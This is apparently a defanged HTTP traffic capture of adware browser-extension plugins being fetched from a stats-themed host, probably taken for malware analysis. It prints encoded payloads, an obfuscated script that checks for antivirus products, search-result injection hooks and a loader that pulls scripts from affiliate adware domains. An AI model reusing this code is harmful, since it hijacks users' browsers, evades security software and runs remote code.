JlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYw
YjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExND
YwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAy
NWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0OD
BmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgw
NzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0Mz
QyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1
MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMD
M3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1
ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMD
AwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMz
MzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTExMTExMTYwNTE2MDY0YjM2M2MwND
EyMWUyNzA2MWMxZTNhMzY1ZTRkMzkyNzNiMzMzNjIyMzYzYjJhMmUyMzJhMjcyMjM2MjQy
YjNkMzEzMzM5M2IzNzI1M2MyZTNhNGU1ODFkMGYxNjFjMGUwZTVmM2EzNjBkMWUwMDI3MT
YwMDE0MTQzYTM2NWU0ZDM5MjczYjMzMzYyMjM2M2IyYTJlMjMyYTI3MjAyOTIxM2EyNzIy
MjcyMzI3Mjc0NjQyNTM2ZjE0', 'ayqeicjfxx'); }....

<<< skipped >>>

GET /plugins/mins/334.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1415748965"

Last-Modified: Tue, 11 Nov 2014 23:36:05 GMT

Cache-Control: max-age=900

Content-Length: 967

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds005.fr7.c

if (typeof setup2 === 'function') { setup2('MTk2OTRhNTc1OTRjNTYwYzE3MW
YxMjM2MTgxYjViNTY1NDQ2MGIxZjE2MTM1MDU4NTYwOTBjMTA1MjQ1MTUwNjA4MDQxNjAw
MTkwYjBkNDUwMTBjMDc1ODBlMWYyYjBiMDEwZDNkNWE1OTQ2MTM1NDJiNGEwOTE4NWQwMD
BiMWEwOTBkMWQwMzBkMjIwNjVlMzUyODNhM2UzYjM3MzAzOTJiMjcyZjI1MjYyZjM1Mjkz
MzM0MmIyNzM1Mjg1ZjBmMWIxMTBkMWYxMDFhMjkxODFkMDk0OTNiM2MyODMwMmMzOTI0Mm
IyNTMwMjEzMTM0MjEyYzNmMzkyZDNlMmQzYjIwMjQyNjI2MzUyODVmMDUxYTE3MTcwYTBl
MGYwYjAzMTAwMzFhMzAwYTA2MDc1ZTM1MjgzYTNlM2IzNzMwMzkyYjI3MmYyNTI2MjUzYT
M3MzcyYTJlMmYzNTIzMzAyMTMxM2IzYzRkMDMxMzFhM2UzZDUxMmIzYjIwMzkyZDMwMzky
NTMwMjgzMTM2M2MyYTMyMzMzNTNlM2QzMzJiNDIyYTI5MmIyMDU3MjgyNjJmMjYyYjMwMz
gzMDJhMmUzMjJiMzMzZDJhMzAzZjIzMmYyNjMyMmIzMzIxMzcyNjM5M2QyYTJlMjgyNjRh
MTUxNDEzMjUwMzBlMGY0YTI2MzMzNzM2MmMzODMxMzEyMzMzM2MzZTJiMjUzMzNiM2QyZD
JiM2EzYzMzMmI0MjEwMWUwMDJhMmU0YTI2MzMzNzM2MmMzODMxMzEyMzMzM2MzZTJiMjEz
YjNmMjcyZDJlMzIzZDMzMjczMTIxMzQyYjI3MzUyODViNDA3ZTQ0NDM0YjQyNDExYTFiMG
MwYjFkMGEyYTBmNDA1OTRhNDQ0YTU4N2UxOQ==', 'bcjwyltdck'); }....

GET /plugins/mins/273.js?ver=6&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1418314330"

Last-Modified: Thu, 11 Dec 2014 16:12:10 GMT

Cache-Control: max-age=900

Content-Length: 903

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds029.fr7.c

if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMD
AxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3
MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNT
E3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIz
NTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MW
YwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJj
MzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYj
E0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIx
MTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNT
IxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNm
MmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNj
NlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0
NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }
....

GET /plugins/mins/242.js?ver=4&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1403211500"

Last-Modified: Thu, 19 Jun 2014 20:58:20 GMT

Cache-Control: max-age=900

Content-Length: 1023

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds009.fr7.c

if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMT
EwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBi
MWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYz
I0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgz
MjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMj
EyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4
MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMT
MyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGEx
ZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MD
QzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4
NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNj
M2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYz
NDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2Mm
QyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJm
MTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }....

GET /plugins/mins/230.js?ver=7&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1408273144"

Last-Modified: Sun, 17 Aug 2014 10:59:04 GMT

Cache-Control: max-age=900

Content-Length: 867

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds022.fr7.c

if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMW
YxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAy
MGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1ND
A2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0
NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3ND
YwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4
NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YT
VhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1
MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMD
QxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJl
MzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MT
MxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0
YTY3MDU=', 'xvnahjjxhm'); }....

GET /plugins/mins/223.js?ver=9&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1418314404"

Last-Modified: Thu, 11 Dec 2014 16:13:24 GMT

Cache-Control: max-age=900

Content-Length: 823

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds015.fr7.c

if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MD
gxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFj
NTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNj
E0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQy
NTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0Mj
gzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJj
MDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYT
AzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMx
ODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2
YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIy
MmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMD
E5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }....

GET /plugins/mins/200.js?ver=4&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1411077330"

Last-Modified: Thu, 18 Sep 2014 21:55:30 GMT

Cache-Control: max-age=900

Content-Length: 807

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c

if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMD
AwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBh
NGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMz
MzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2Yy
MjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMz
UzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRl
NTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZD
E1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMy
YzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMm
QzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0
M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1Nj
RjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }....

GET /plugins/mins/220.js?ver=38&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1420463978"

Last-Modified: Mon, 05 Jan 2015 13:19:38 GMT

Cache-Control: max-age=619

Content-Length: 39907

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c
if(appAPI.isBackground){var ICMBaseManager=function(a){return function
(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(
function(){var z={"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1
,"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,"\x61\x7
6\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,"\x6D\x73\x65\x5F
\x64\x65\x74\x65\x63\x74\x65\x64":8,"\x65\x73\x65\x74\x5F\x64\x65\x74\
x65\x63\x74\x65\x64":16,"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\
x74\x65\x64":32,"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\
x64":64,"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\
x63\x74\x65\x64":128,"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65
\x63\x74\x65\x64":256,"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x7
4\x65\x63\x74\x65\x64":512,"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x
65\x63\x74\x65\x64":1024,"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65
\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,"\x62\x61\x69\x64\x75\x
61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,"\x73\x70\x61\x72\x6B
\x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,"\x
62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65
\x63\x74\x65\x64":16384,"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\
x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x6
4":32768,"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64
":65536,"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\
x65\x74\x65\x63\x74\x65\x64":131072,"\x67\x65\x65\x6B\x5F\x62\x75\<<< skipped >>>

GET /plugins/mins/9.js?ver=3&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1402409612"

Last-Modified: Tue, 10 Jun 2014 14:13:32 GMT

Cache-Control: max-age=900

Content-Length: 2385

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668153.cds037.fr7.c
appAPI.hooks.addHook("searchEngine",(function(a){return function(){var
 f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({
name:"google",url:"google",input:"input[name=q]",results:"#rso",result
:'<li class="g" />'});this.addEngine({name:"bing",url:"bing.com"
,input:"input[name=q]",results:"#results > ul",result:'<li class
="sa_wr" />'});this.addEngine({name:"yandex",url:"yandex.ru",input:
"form.b-head-search input.b-form-input__input,form.b-search input.b-fo
rm-input__input",results:".b-body-items > ol",result:'<li class=
"b-serp-item i-bem b-serp-item_js_inited" />'});this.addEngine({nam
e:"yandex",url:"yandex.com",input:"form.b-search input.b-form-input__i
nput,#searchInput",results:".b-serp2-list__portion",result:'<div cl
ass="b-serp-block" />'});this.addEngine({name:"yahoo",url:"yahoo.co
m",input:"input[name=p]",results:"#web ol:eq(0)",result:"<li />"
});this.addEngine({name:"yahoo",url:"search.yahoo.com",input:"input[na
me=p]",results:"#web ol:eq(0)",result:"<li />"});this.addEngine(
{name:"ask",url:"ask.com",input:"input[name=q]",results:"#lindm",resul
t:'<div class="tsrc_tled" />'});this.addEngine({name:"aol",url:"
aol.com",input:"input[name=q]",results:"#w .MSL:eq(0) ul",result:'<
li about="null" />'});this.addEngine({name:"aol",url:"search.aol.co
m",input:"input[name=q]",results:"#w .MSL:eq(0) ul",result:'<li abo
ut="null" />'});this.addEngine({name:"youtube",url:"youtube.com",in
put:"input[name=search_query]",results:"#search-results",result:'&<<< skipped >>>

GET /plugins/mins/184.js?ver=11&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1420026483"

Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT

Cache-Control: max-age=397

Content-Length: 1231

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c

if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMW
QxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFm
NWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyOD
FkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0
OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMz
YwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFj
NWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyND
A4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2Mz
NDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NG
Q0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQy
MTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNT
Q0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0
OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMD
cxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0
M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzODM3MmUzNDI0MjYyNTQwMzgxZj
A4MTUwZDE4MTMzMDFlNWIzMzJmMjQyYjIwMmEzMjJiMzMyMjI5MjIzODNjMzcyZDI0Mzcz
ZTIzMjgyZjM0MmMyZDI2MjgzZDI1Mzk0ZTVjNmQ3MDRkMDkwZDBjMWQwZjAyMzkwMzViNT
U1OTUwNDE0ZTZjMTE3YQ==', 'yayzflpgyo'); }....

<<< skipped >>>

GET /plugins/mins/102.js?ver=15&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1426423396"

Last-Modified: Sun, 15 Mar 2015 12:43:16 GMT

Cache-Control: max-age=621

Content-Length: 1023

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668152.cds012.fr7.c

if (typeof setup2 === 'function') { setup2('MDM3YTU0NTU1NTU1NDYxODFmMW
EwODI1MDYxOTU3NGY0NDUyMDMxYTBjMDA0ZTVhNWExYzRhMTMxOTBjMGIxYTA3NWIxYzFi
MDIxZjQ0MGQwYTEyMTI1YTFmMTQxMjExMTgwZDBhMTkwNDAxNWIxZjE3NGYwODA2MTkxZT
FhMTAxOTQ4MDcwMjBmMWMyNzJmMmIzNjI3M2EzNzIzMzkyNzNjMzUyNjJhMzAyZDMwMzUy
NTJhM2QzNDJiMjYyMDM3M2IzOTJmMzEyNzU2MTUwNTA1MjEwZDA0MDcwYjQ1MmYyYjM2Mj
czYTM3MjMzOTI3M2MzNTI2MmEzNDI1MzQyZjI1MmYzNTM1MmIyYTUzMWQwZDE0NTYzMTI3
MzMyNjNhMjYyNjM2MzkyZjJiMmEyZjIxMjYzMDI3M2IzOTJmMzEyNzUyNTg3ZjU1NTU0ND
UwNDkwNjBjMDQwNDA2MjAwNzA4NTI1MTRlNWExODAwMDEwNTA2NWU1ZjQ0MDcyNzEzMDYx
NzA2MWYxNzJmMDIwMDFlMWY1YTAxMTkwNjA3MTQwNTQwMWIxZjE5NWExNjA3MDYxNjQ0MD
QxOTA2MTUwNjE2MDcwZDAwMWY0MDEyMDM0YjE2MWQxNDBhMWUwZTAyNDUxMzA2MTEwNzJh
M2IyZjI4M2MzNzIzMjcyNzNjMzEyMTIyMzQyYjIwMjQzMTNiMzEzMDIwMmYzODNiM2EyZj
NkMzEyYTJhNDIxMTFiMWUyYzE5MDAxOTEwNDgzYjJmMjgzYzM3MjMyNzI3M2MzMTIxMjIz
NDJmMjgyMDJiM2IzNDM4MjEyZjM0NDgxMDE5MTA0ODJhMmEyNzIyMjQzZDJiMjIzZDMxMz
AyNzNiMjUzODJiMmEyZjNkMzEyYTJhNDY1YzYxNGU1ODUwNTQ1NzA1MTkxMTE3MDIwMDMx
MTQ1NjRmNTU0NDU0NDI2MTEz', 'xptuuudpkn'); }....

GET /plugins/mins/376.js?ver=3&rnd=6334 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:13 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1426525251"

Last-Modified: Mon, 16 Mar 2015 17:00:51 GMT

Cache-Control: max-age=900

Content-Length: 10918

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop002.fr7.t,1427668153.cds023.fr7.c
(function(){var a=(function(){var l=function(){return appAPI&&appAPI.i
nstaller&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?
appAPI.installer.getAdditionalInfo():null;};var j={ie:"10",ni:"11",te:
"19",ch:"20",to:"26",sb:"27",op:"28",tc:"29",ff:"30",tf:"39",sf:"40",n
v:"50",ms:"51",mf:"52",mc:"53",np:"54",sm:"55",fm:"56",cm:"57",mx:"60"
};var p="source_id";var k="776";var e="__PageActive__";var q=new Date(
2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.insta
ller&&typeof appAPI.installer.getUnixTime==="function")?appAPI.install
er.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[
{pluginId:288,httpUrl:"hXXp://istatic.datafastguru.info/fo/min/crqc.js
?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROS
SRIDER_EXTENDED_SUB_ID__",delay:0},{pluginId:242,httpUrl:"hXXp://inst.
shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__
CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME_
_",httpsUrl:"hXXps://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=cr
srdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_N
AME=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:385,httpUrl:"hXXp://ap
i.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_
SUB_ID__&name=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://api.jollywall
et.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_SUB_ID__&na
me=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:390,httpUrl:"hXXp://cdn
